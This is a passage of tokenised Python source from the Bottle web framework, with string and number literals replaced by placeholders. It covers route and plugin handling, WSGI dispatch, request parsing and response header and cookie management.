join ( allowed ) ) ] ) <EOL> class Route ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , app , rule , method , callback , name = None , <EOL> plugins = None , skiplist = None , ** config ) : <EOL> self . app = app <EOL> self . rule = rule <EOL> self . method = method <EOL> self . callback = callback <EOL> self . name = name or None <EOL> self . plugins = plugins or [ ] <EOL> self . skiplist = skiplist or [ ] <EOL> self . config = ConfigDict ( config ) <EOL> def __call__ ( self , * a , ** ka ) : <EOL> depr ( "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" ) <EOL> return self . call ( * a , ** ka ) <EOL> @ cached_property <EOL> def call ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _make_callback ( ) <EOL> def reset ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . __dict__ . pop ( '<STR_LIT>' , None ) <EOL> def prepare ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . call <EOL> @ property <EOL> def _context ( self ) : <EOL> depr ( '<STR_LIT>' ) <EOL> return dict ( rule = self . rule , method = self . method , callback = self . callback , <EOL> name = self . name , app = self . app , config = self . config , <EOL> apply = self . plugins , skip = self . skiplist ) <EOL> def all_plugins ( self ) : <EOL> '''<STR_LIT>''' <EOL> unique = set ( ) <EOL> for p in reversed ( self . app . plugins + self . plugins ) : <EOL> if True in self . skiplist : break <EOL> name = getattr ( p , '<STR_LIT:name>' , False ) <EOL> if name and ( name in self . skiplist or name in unique ) : continue <EOL> if p in self . skiplist or type ( p ) in self . skiplist : continue <EOL> if name : unique . add ( name ) <EOL> yield p <EOL> def _make_callback ( self ) : <EOL> callback = self . callback <EOL> for plugin in self . all_plugins ( ) : <EOL> try : <EOL> if hasattr ( plugin , '<STR_LIT>' ) : <EOL> api = getattr ( plugin , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> context = self if api > <NUM_LIT:1> else self . _context <EOL> callback = plugin . 
apply ( callback , context ) <EOL> else : <EOL> callback = plugin ( callback ) <EOL> except RouteReset : <EOL> return self . _make_callback ( ) <EOL> if not callback is self . callback : <EOL> update_wrapper ( callback , self . callback ) <EOL> return callback <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . method , self . rule , self . callback ) <EOL> class Bottle ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , catchall = True , autojson = True ) : <EOL> self . catchall = catchall <EOL> self . resources = ResourceManager ( ) <EOL> self . config = ConfigDict ( ) <EOL> self . config . autojson = autojson <EOL> self . routes = [ ] <EOL> self . router = Router ( ) <EOL> self . error_handler = { } <EOL> self . plugins = [ ] <EOL> self . hooks = HooksPlugin ( ) <EOL> self . install ( self . hooks ) <EOL> if self . config . autojson : <EOL> self . install ( JSONPlugin ( ) ) <EOL> self . install ( TemplatePlugin ( ) ) <EOL> def mount ( self , prefix , app , ** options ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( app , basestring ) : <EOL> prefix , app = app , prefix <EOL> depr ( '<STR_LIT>' ) <EOL> parts = [ p for p in prefix . split ( '<STR_LIT:/>' ) if p ] <EOL> if not parts : raise ValueError ( '<STR_LIT>' ) <EOL> path_depth = len ( parts ) <EOL> options . setdefault ( '<STR_LIT>' , True ) <EOL> options . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ self . route ( '<STR_LIT>' % '<STR_LIT:/>' . join ( parts ) , ** options ) <EOL> def mountpoint ( ) : <EOL> try : <EOL> request . path_shift ( path_depth ) <EOL> rs = BaseResponse ( [ ] , <NUM_LIT:200> ) <EOL> def start_response ( status , header ) : <EOL> rs . status = status <EOL> for name , value in header : rs . add_header ( name , value ) <EOL> return rs . body . append <EOL> rs . body = itertools . chain ( rs . body , app ( request . environ , start_response ) ) <EOL> return HTTPResponse ( rs . body , rs . status_code , rs . headers ) <EOL> finally : <EOL> request . 
path_shift ( - path_depth ) <EOL> if not prefix . endswith ( '<STR_LIT:/>' ) : <EOL> self . route ( '<STR_LIT:/>' + '<STR_LIT:/>' . join ( parts ) , callback = mountpoint , ** options ) <EOL> def merge ( self , routes ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( routes , Bottle ) : <EOL> routes = routes . routes <EOL> for route in routes : <EOL> self . add_route ( route ) <EOL> def install ( self , plugin ) : <EOL> '''<STR_LIT>''' <EOL> if hasattr ( plugin , '<STR_LIT>' ) : plugin . setup ( self ) <EOL> if not callable ( plugin ) and not hasattr ( plugin , '<STR_LIT>' ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> self . plugins . append ( plugin ) <EOL> self . reset ( ) <EOL> return plugin <EOL> def uninstall ( self , plugin ) : <EOL> '''<STR_LIT>''' <EOL> removed , remove = [ ] , plugin <EOL> for i , plugin in list ( enumerate ( self . plugins ) ) [ : : - <NUM_LIT:1> ] : <EOL> if remove is True or remove is plugin or remove is type ( plugin ) or getattr ( plugin , '<STR_LIT:name>' , True ) == remove : <EOL> removed . append ( plugin ) <EOL> del self . plugins [ i ] <EOL> if hasattr ( plugin , '<STR_LIT>' ) : plugin . close ( ) <EOL> if removed : self . reset ( ) <EOL> return removed <EOL> def run ( self , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> run ( self , ** kwargs ) <EOL> def reset ( self , route = None ) : <EOL> '''<STR_LIT>''' <EOL> if route is None : routes = self . routes <EOL> elif isinstance ( route , Route ) : routes = [ route ] <EOL> else : routes = [ self . routes [ route ] ] <EOL> for route in routes : route . reset ( ) <EOL> if DEBUG : <EOL> for route in routes : route . prepare ( ) <EOL> self . hooks . trigger ( '<STR_LIT>' ) <EOL> def close ( self ) : <EOL> '''<STR_LIT>''' <EOL> for plugin in self . plugins : <EOL> if hasattr ( plugin , '<STR_LIT>' ) : plugin . close ( ) <EOL> self . stopped = True <EOL> def match ( self , environ ) : <EOL> """<STR_LIT>""" <EOL> return self . router . 
match ( environ ) <EOL> def get_url ( self , routename , ** kargs ) : <EOL> """<STR_LIT>""" <EOL> scriptname = request . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) + '<STR_LIT:/>' <EOL> location = self . router . build ( routename , ** kargs ) . lstrip ( '<STR_LIT:/>' ) <EOL> return urljoin ( urljoin ( '<STR_LIT:/>' , scriptname ) , location ) <EOL> def add_route ( self , route ) : <EOL> '''<STR_LIT>''' <EOL> self . routes . append ( route ) <EOL> self . router . add ( route . rule , route . method , route , name = route . name ) <EOL> if DEBUG : route . prepare ( ) <EOL> def route ( self , path = None , method = '<STR_LIT:GET>' , callback = None , name = None , <EOL> apply = None , skip = None , ** config ) : <EOL> """<STR_LIT>""" <EOL> if callable ( path ) : path , callback = None , path <EOL> plugins = makelist ( apply ) <EOL> skiplist = makelist ( skip ) <EOL> def decorator ( callback ) : <EOL> if isinstance ( callback , basestring ) : callback = load ( callback ) <EOL> for rule in makelist ( path ) or yieldroutes ( callback ) : <EOL> for verb in makelist ( method ) : <EOL> verb = verb . upper ( ) <EOL> route = Route ( self , rule , verb , callback , name = name , <EOL> plugins = plugins , skiplist = skiplist , ** config ) <EOL> self . add_route ( route ) <EOL> return callback <EOL> return decorator ( callback ) if callback else decorator <EOL> def get ( self , path = None , method = '<STR_LIT:GET>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . route ( path , method , ** options ) <EOL> def post ( self , path = None , method = '<STR_LIT:POST>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . route ( path , method , ** options ) <EOL> def put ( self , path = None , method = '<STR_LIT>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . route ( path , method , ** options ) <EOL> def delete ( self , path = None , method = '<STR_LIT>' , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . 
route ( path , method , ** options ) <EOL> def error ( self , code = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( handler ) : <EOL> self . error_handler [ int ( code ) ] = handler <EOL> return handler <EOL> return wrapper <EOL> def hook ( self , name ) : <EOL> """<STR_LIT>""" <EOL> def wrapper ( func ) : <EOL> self . hooks . add ( name , func ) <EOL> return func <EOL> return wrapper <EOL> def handle ( self , path , method = '<STR_LIT:GET>' ) : <EOL> """<STR_LIT>""" <EOL> depr ( "<STR_LIT>" ) <EOL> if isinstance ( path , dict ) : <EOL> return self . _handle ( path ) <EOL> return self . _handle ( { '<STR_LIT>' : path , '<STR_LIT>' : method . upper ( ) } ) <EOL> def _handle ( self , environ ) : <EOL> try : <EOL> environ [ '<STR_LIT>' ] = self <EOL> request . bind ( environ ) <EOL> response . bind ( ) <EOL> route , args = self . router . match ( environ ) <EOL> environ [ '<STR_LIT>' ] = environ [ '<STR_LIT>' ] = route <EOL> environ [ '<STR_LIT>' ] = args <EOL> return route . call ( ** args ) <EOL> except HTTPResponse : <EOL> return _e ( ) <EOL> except RouteReset : <EOL> route . reset ( ) <EOL> return self . _handle ( environ ) <EOL> except ( KeyboardInterrupt , SystemExit , MemoryError ) : <EOL> raise <EOL> except Exception : <EOL> if not self . catchall : raise <EOL> stacktrace = format_exc ( <NUM_LIT:10> ) <EOL> environ [ '<STR_LIT>' ] . write ( stacktrace ) <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" , _e ( ) , stacktrace ) <EOL> def _cast ( self , out , peek = None ) : <EOL> """<STR_LIT>""" <EOL> if not out : <EOL> response [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> return [ ] <EOL> if isinstance ( out , ( tuple , list ) ) and isinstance ( out [ <NUM_LIT:0> ] , ( bytes , unicode ) ) : <EOL> out = out [ <NUM_LIT:0> ] [ <NUM_LIT:0> : <NUM_LIT:0> ] . join ( out ) <EOL> if isinstance ( out , unicode ) : <EOL> out = out . encode ( response . 
charset ) <EOL> if isinstance ( out , bytes ) : <EOL> response [ '<STR_LIT>' ] = len ( out ) <EOL> return [ out ] <EOL> if isinstance ( out , HTTPError ) : <EOL> out . apply ( response ) <EOL> out = self . error_handler . get ( out . status , repr ) ( out ) <EOL> if isinstance ( out , HTTPResponse ) : <EOL> depr ( '<STR_LIT>' ) <EOL> return self . _cast ( out ) <EOL> if isinstance ( out , HTTPResponse ) : <EOL> out . apply ( response ) <EOL> return self . _cast ( out . output ) <EOL> if hasattr ( out , '<STR_LIT>' ) : <EOL> if '<STR_LIT>' in request . environ : <EOL> return request . environ [ '<STR_LIT>' ] ( out ) <EOL> elif hasattr ( out , '<STR_LIT>' ) or not hasattr ( out , '<STR_LIT>' ) : <EOL> return WSGIFileWrapper ( out ) <EOL> try : <EOL> out = iter ( out ) <EOL> first = next ( out ) <EOL> while not first : <EOL> first = next ( out ) <EOL> except StopIteration : <EOL> return self . _cast ( '<STR_LIT>' ) <EOL> except HTTPResponse : <EOL> first = _e ( ) <EOL> except ( KeyboardInterrupt , SystemExit , MemoryError ) : <EOL> raise <EOL> except Exception : <EOL> if not self . catchall : raise <EOL> first = HTTPError ( <NUM_LIT> , '<STR_LIT>' , _e ( ) , format_exc ( <NUM_LIT:10> ) ) <EOL> if isinstance ( first , HTTPResponse ) : <EOL> return self . _cast ( first ) <EOL> if isinstance ( first , bytes ) : <EOL> return itertools . chain ( [ first ] , out ) <EOL> if isinstance ( first , unicode ) : <EOL> return imap ( lambda x : x . encode ( response . charset ) , <EOL> itertools . chain ( [ first ] , out ) ) <EOL> return self . _cast ( HTTPError ( <NUM_LIT> , '<STR_LIT>' % type ( first ) ) ) <EOL> def wsgi ( self , environ , start_response ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> out = self . _cast ( self . _handle ( environ ) ) <EOL> if response . _status_code in ( <NUM_LIT:100> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) or request . method == '<STR_LIT>' : <EOL> if hasattr ( out , '<STR_LIT>' ) : out . close ( ) <EOL> out = [ ] <EOL> if isinstance ( response . 
_status_line , unicode ) : <EOL> response . _status_line = str ( response . _status_line ) <EOL> start_response ( response . _status_line , list ( response . iter_headers ( ) ) ) <EOL> return out <EOL> except ( KeyboardInterrupt , SystemExit , MemoryError ) : <EOL> raise <EOL> except Exception : <EOL> if not self . catchall : raise <EOL> err = '<STR_LIT>' % html_escape ( environ . get ( '<STR_LIT>' , '<STR_LIT:/>' ) ) <EOL> if DEBUG : <EOL> err += '<STR_LIT>' '<STR_LIT>' % ( html_escape ( repr ( _e ( ) ) ) , html_escape ( format_exc ( <NUM_LIT:10> ) ) ) <EOL> environ [ '<STR_LIT>' ] . write ( err ) <EOL> headers = [ ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) ] <EOL> start_response ( '<STR_LIT>' , headers ) <EOL> return [ tob ( err ) ] <EOL> def __call__ ( self , environ , start_response ) : <EOL> '''<STR_LIT>''' <EOL> return self . wsgi ( environ , start_response ) <EOL> class BaseRequest ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' ) <EOL> MEMFILE_MAX = <NUM_LIT> <EOL> MAX_PARAMS = <NUM_LIT:100> <EOL> def __init__ ( self , environ = None ) : <EOL> """<STR_LIT>""" <EOL> self . environ = { } if environ is None else environ <EOL> self . environ [ '<STR_LIT>' ] = self <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def app ( self ) : <EOL> '''<STR_LIT>''' <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> @ property <EOL> def path ( self ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT:/>' + self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . lstrip ( '<STR_LIT:/>' ) <EOL> @ property <EOL> def method ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . environ . get ( '<STR_LIT>' , '<STR_LIT:GET>' ) . upper ( ) <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def headers ( self ) : <EOL> '''<STR_LIT>''' <EOL> return WSGIHeaderDict ( self . environ ) <EOL> def get_header ( self , name , default = None ) : <EOL> '''<STR_LIT>''' <EOL> return self . headers . 
get ( name , default ) <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def cookies ( self ) : <EOL> """<STR_LIT>""" <EOL> cookies = SimpleCookie ( self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> cookies = list ( cookies . values ( ) ) [ : self . MAX_PARAMS ] <EOL> return FormsDict ( ( c . key , c . value ) for c in cookies ) <EOL> def get_cookie ( self , key , default = None , secret = None ) : <EOL> """<STR_LIT>""" <EOL> value = self . cookies . get ( key ) <EOL> if secret and value : <EOL> dec = cookie_decode ( value , secret ) <EOL> return dec [ <NUM_LIT:1> ] if dec and dec [ <NUM_LIT:0> ] == key else default <EOL> return value or default <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def query ( self ) : <EOL> '''<STR_LIT>''' <EOL> pairs = parse_qsl ( self . query_string , keep_blank_values = True ) <EOL> get = self . environ [ '<STR_LIT>' ] = FormsDict ( ) <EOL> for key , value in pairs [ : self . MAX_PARAMS ] : <EOL> get [ key ] = value <EOL> return get <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def forms ( self ) : <EOL> """<STR_LIT>""" <EOL> forms = FormsDict ( ) <EOL> for name , item in self . POST . allitems ( ) : <EOL> if not hasattr ( item , '<STR_LIT:filename>' ) : <EOL> forms [ name ] = item <EOL> return forms <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def params ( self ) : <EOL> """<STR_LIT>""" <EOL> params = FormsDict ( ) <EOL> for key , value in self . query . allitems ( ) : <EOL> params [ key ] = value <EOL> for key , value in self . forms . allitems ( ) : <EOL> params [ key ] = value <EOL> return params <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def files ( self ) : <EOL> """<STR_LIT>""" <EOL> files = FormsDict ( ) <EOL> for name , item in self . POST . 
allitems ( ) : <EOL> if hasattr ( item , '<STR_LIT:filename>' ) : <EOL> files [ name ] = item <EOL> return files <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def json ( self ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT:application/json>' in self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) and <NUM_LIT:0> < self . content_length < self . MEMFILE_MAX : <EOL> return json_loads ( self . body . read ( self . MEMFILE_MAX ) ) <EOL> return None <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def _body ( self ) : <EOL> maxread = max ( <NUM_LIT:0> , self . content_length ) <EOL> stream = self . environ [ '<STR_LIT>' ] <EOL> body = BytesIO ( ) if maxread < self . MEMFILE_MAX else TemporaryFile ( mode = '<STR_LIT>' ) <EOL> while maxread > <NUM_LIT:0> : <EOL> part = stream . read ( min ( maxread , self . MEMFILE_MAX ) ) <EOL> if not part : break <EOL> body . write ( part ) <EOL> maxread -= len ( part ) <EOL> self . environ [ '<STR_LIT>' ] = body <EOL> body . seek ( <NUM_LIT:0> ) <EOL> return body <EOL> @ property <EOL> def body ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _body . seek ( <NUM_LIT:0> ) <EOL> return self . _body <EOL> GET = query <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def POST ( self ) : <EOL> """<STR_LIT>""" <EOL> post = FormsDict ( ) <EOL> safe_env = { '<STR_LIT>' : '<STR_LIT>' } <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if key in self . environ : safe_env [ key ] = self . environ [ key ] <EOL> if NCTextIOWrapper : <EOL> fb = NCTextIOWrapper ( self . body , encoding = '<STR_LIT>' , newline = '<STR_LIT:\n>' ) <EOL> else : <EOL> fb = self . body <EOL> data = cgi . FieldStorage ( fp = fb , environ = safe_env , keep_blank_values = True ) <EOL> for item in ( data . list or [ ] ) [ : self . MAX_PARAMS ] : <EOL> post [ item . name ] = item if item . filename else item . 
value <EOL> return post <EOL> @ property <EOL> def COOKIES ( self ) : <EOL> '''<STR_LIT>''' <EOL> depr ( '<STR_LIT>' ) <EOL> return self . cookies <EOL> @ property <EOL> def url ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . urlparts . geturl ( ) <EOL> @ DictProperty ( '<STR_LIT>' , '<STR_LIT>' , read_only = True ) <EOL> def urlparts ( self ) : <EOL> '''<STR_LIT>''' <EOL> env = self . environ <EOL> http = env . get ( '<STR_LIT>' , '<STR_LIT:http>' ) <EOL> host = env . get ( '<STR_LIT>' ) or env . get ( '<STR_LIT>' ) <EOL> if not host : <EOL> host = env . get ( '<STR_LIT>' , '<STR_LIT:127.0.0.1>' ) <EOL> port = env . get ( '<STR_LIT>' ) <EOL> if port and port != ( '<STR_LIT>' if http == '<STR_LIT:http>' else '<STR_LIT>' ) : <EOL> host += '<STR_LIT::>' + port <EOL> path = urlquote ( self . fullpath ) <EOL> return UrlSplitResult ( http , host , path , env . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> @ property <EOL> def fullpath ( self ) : <EOL> """<STR_LIT>""" <EOL> return urljoin ( self . script_name , self . path . lstrip ( '<STR_LIT:/>' ) ) <EOL> @ property <EOL> def query_string ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ property <EOL> def script_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> script_name = self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> return '<STR_LIT:/>' + script_name + '<STR_LIT:/>' if script_name else '<STR_LIT:/>' <EOL> def path_shift ( self , shift = <NUM_LIT:1> ) : <EOL> '''<STR_LIT>''' <EOL> script = self . environ . get ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> self [ '<STR_LIT>' ] , self [ '<STR_LIT>' ] = path_shift ( script , self . path , shift ) <EOL> @ property <EOL> def content_length ( self ) : <EOL> '''<STR_LIT>''' <EOL> return int ( self . environ . get ( '<STR_LIT>' ) or - <NUM_LIT:1> ) <EOL> @ property <EOL> def is_xhr ( self ) : <EOL> '''<STR_LIT>''' <EOL> requested_with = self . environ . 
get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return requested_with . lower ( ) == '<STR_LIT>' <EOL> @ property <EOL> def is_ajax ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . is_xhr <EOL> @ property <EOL> def auth ( self ) : <EOL> """<STR_LIT>""" <EOL> basic = parse_auth ( self . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if basic : return basic <EOL> ruser = self . environ . get ( '<STR_LIT>' ) <EOL> if ruser : return ( ruser , None ) <EOL> return None <EOL> @ property <EOL> def remote_route ( self ) : <EOL> """<STR_LIT>""" <EOL> proxy = self . environ . get ( '<STR_LIT>' ) <EOL> if proxy : return [ ip . strip ( ) for ip in proxy . split ( '<STR_LIT:U+002C>' ) ] <EOL> remote = self . environ . get ( '<STR_LIT>' ) <EOL> return [ remote ] if remote else [ ] <EOL> @ property <EOL> def remote_addr ( self ) : <EOL> """<STR_LIT>""" <EOL> route = self . remote_route <EOL> return route [ <NUM_LIT:0> ] if route else None <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return Request ( self . environ . copy ( ) ) <EOL> def get ( self , value , default = None ) : return self . environ . get ( value , default ) <EOL> def __getitem__ ( self , key ) : return self . environ [ key ] <EOL> def __delitem__ ( self , key ) : self [ key ] = "<STR_LIT>" ; del ( self . environ [ key ] ) <EOL> def __iter__ ( self ) : return iter ( self . environ ) <EOL> def __len__ ( self ) : return len ( self . environ ) <EOL> def keys ( self ) : return self . environ . keys ( ) <EOL> def __setitem__ ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> if self . environ . get ( '<STR_LIT>' ) : <EOL> raise KeyError ( '<STR_LIT>' ) <EOL> self . environ [ key ] = value <EOL> todelete = ( ) <EOL> if key == '<STR_LIT>' : <EOL> todelete = ( '<STR_LIT:body>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif key == '<STR_LIT>' : <EOL> todelete = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> elif key . 
startswith ( '<STR_LIT>' ) : <EOL> todelete = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for key in todelete : <EOL> self . environ . pop ( '<STR_LIT>' + key , None ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . method , self . url ) <EOL> def __getattr__ ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> var = self . environ [ '<STR_LIT>' % name ] <EOL> return var . __get__ ( self ) if hasattr ( var , '<STR_LIT>' ) else var <EOL> except KeyError : <EOL> raise AttributeError ( '<STR_LIT>' % name ) <EOL> def __setattr__ ( self , name , value ) : <EOL> if name == '<STR_LIT>' : return object . __setattr__ ( self , name , value ) <EOL> self . environ [ '<STR_LIT>' % name ] = value <EOL> def _hkey ( s ) : <EOL> return s . title ( ) . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) <EOL> class HeaderProperty ( object ) : <EOL> def __init__ ( self , name , reader = None , writer = str , default = '<STR_LIT>' ) : <EOL> self . name , self . reader , self . writer , self . default = name , reader , writer , default <EOL> self . __doc__ = '<STR_LIT>' % name . title ( ) <EOL> def __get__ ( self , obj , cls ) : <EOL> if obj is None : return self <EOL> value = obj . headers . get ( self . name ) <EOL> return self . reader ( value ) if ( value and self . reader ) else ( value or self . default ) <EOL> def __set__ ( self , obj , value ) : <EOL> if self . writer : value = self . writer ( value ) <EOL> obj . headers [ self . name ] = value <EOL> def __delete__ ( self , obj ) : <EOL> if self . name in obj . headers : <EOL> del obj . headers [ self . 
name ] <EOL> class BaseResponse ( object ) : <EOL> """<STR_LIT>""" <EOL> default_status = <NUM_LIT:200> <EOL> default_content_type = '<STR_LIT>' <EOL> bad_headers = { <EOL> <NUM_LIT> : set ( ( '<STR_LIT:Content-Type>' , ) ) , <EOL> <NUM_LIT> : set ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:Content-Type>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) ) } <EOL> def __init__ ( self , body = '<STR_LIT>' , status = None , ** headers ) : <EOL> self . _status_line = None <EOL> self . _status_code = None <EOL> self . _cookies = None <EOL> self . _headers = { '<STR_LIT:Content-Type>' : [ self . default_content_type ] } <EOL> self . body = body <EOL> self . status = status or self . default_status <EOL> if headers : <EOL> for name , value in headers . items ( ) : <EOL> self [ name ] = value <EOL> def copy ( self ) : <EOL> '''<STR_LIT>''' <EOL> copy = Response ( ) <EOL> copy . status = self . status <EOL> copy . _headers = dict ( ( k , v [ : ] ) for ( k , v ) in self . _headers . items ( ) ) <EOL> return copy <EOL> def __iter__ ( self ) : <EOL> return iter ( self . body ) <EOL> def close ( self ) : <EOL> if hasattr ( self . body , '<STR_LIT>' ) : <EOL> self . body . close ( ) <EOL> @ property <EOL> def status_line ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _status_line <EOL> @ property <EOL> def status_code ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . _status_code <EOL> def _set_status ( self , status ) : <EOL> if isinstance ( status , int ) : <EOL> code , status = status , _HTTP_STATUS_LINES . get ( status ) <EOL> elif '<STR_LIT:U+0020>' in status : <EOL> status = status . strip ( ) <EOL> code = int ( status . split ( ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not <NUM_LIT:100> <= code <= <NUM_LIT> : raise ValueError ( '<STR_LIT>' ) <EOL> self . _status_code = code <EOL> self . _status_line = status or ( '<STR_LIT>' % code ) <EOL> def _get_status ( self ) : <EOL> return self . 
_status_line <EOL> status = property ( _get_status , _set_status , None , <EOL> '''<STR_LIT>''' ) <EOL> del _get_status , _set_status <EOL> @ property <EOL> def headers ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . __dict__ [ '<STR_LIT>' ] = hdict = HeaderDict ( ) <EOL> hdict . dict = self . _headers <EOL> return hdict <EOL> def __contains__ ( self , name ) : return _hkey ( name ) in self . _headers <EOL> def __delitem__ ( self , name ) : del self . _headers [ _hkey ( name ) ] <EOL> def __getitem__ ( self , name ) : return self . _headers [ _hkey ( name ) ] [ - <NUM_LIT:1> ] <EOL> def __setitem__ ( self , name , value ) : self . _headers [ _hkey ( name ) ] = [ str ( value ) ] <EOL> def get_header ( self , name , default = None ) : <EOL> '''<STR_LIT>''' <EOL> return self . _headers . get ( _hkey ( name ) , [ default ] ) [ - <NUM_LIT:1> ] <EOL> def set_header ( self , name , value , append = False ) : <EOL> '''<STR_LIT>''' <EOL> if append : <EOL> self . add_header ( name , value ) <EOL> else : <EOL> self . _headers [ _hkey ( name ) ] = [ str ( value ) ] <EOL> def add_header ( self , name , value ) : <EOL> '''<STR_LIT>''' <EOL> self . _headers . setdefault ( _hkey ( name ) , [ ] ) . append ( str ( value ) ) <EOL> def iter_headers ( self ) : <EOL> '''<STR_LIT>''' <EOL> headers = self . _headers . items ( ) <EOL> bad_headers = self . bad_headers . get ( self . _status_code ) <EOL> if bad_headers : <EOL> headers = [ h for h in headers if h [ <NUM_LIT:0> ] not in bad_headers ] <EOL> for name , values in headers : <EOL> for value in values : <EOL> yield name , value <EOL> if self . _cookies : <EOL> for c in self . _cookies . values ( ) : <EOL> yield '<STR_LIT>' , c . OutputString ( ) <EOL> def wsgiheader ( self ) : <EOL> depr ( '<STR_LIT>' ) <EOL> return self . headerlist <EOL> @ property <EOL> def headerlist ( self ) : <EOL> '''<STR_LIT>''' <EOL> return list ( self . 
iter_headers ( ) ) <EOL> content_type = HeaderProperty ( '<STR_LIT:Content-Type>' ) <EOL> content_length = HeaderProperty ( '<STR_LIT>' , reader = int ) <EOL> @ property <EOL> def charset ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in self . content_type : <EOL> return self . content_type . split ( '<STR_LIT>' ) [ - <NUM_LIT:1> ] . split ( '<STR_LIT:;>' ) [ <NUM_LIT:0> ] . strip ( ) <EOL> return '<STR_LIT>' <EOL> @ property <EOL> def COOKIES ( self ) : <EOL> """<STR_LIT>""" <EOL> depr ( '<STR_LIT>' ) <EOL> if not self . _cookies : <EOL> self . _cookies = SimpleCookie ( ) <EOL> return self . _cookies <EOL> def set_cookie ( self , name , value , secret = None , ** options ) : <EOL> '''<STR_LIT>''' <EOL> if not self . _cookies : <EOL> self . _cookies = SimpleCookie ( ) <EOL> if secret : <EOL> value = touni ( cookie_encode ( ( name , value ) , secret ) ) <EOL> elif not isinstance ( value , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if len ( value ) > <NUM_LIT> : raise ValueError ( '<STR_LIT>' ) <EOL> self . _cookies [ name ] = value <EOL> for key , value in options . items ( ) : <EOL> if key == '<STR_LIT>' : <EOL> if isinstance ( value , timedelta ) : <EOL> value = value . seconds + value . days * <NUM_LIT> * <NUM_LIT> <EOL> if key == '<STR_LIT>' : <EOL> if isinstance ( value , ( datedate , datetime ) ) : <EOL> value = value . timetuple ( ) <EOL> elif isinstance ( value , ( int , float ) ) : <EOL> value = time . gmtime ( value ) <EOL> value = time . strftime ( "<STR_LIT>" , value ) <EOL> self . _cookies [ name ] [ key . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) ] = value <EOL> def delete_cookie ( self , key , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> kwargs [ '<STR_LIT>' ] = - <NUM_LIT:1> <EOL> kwargs [ 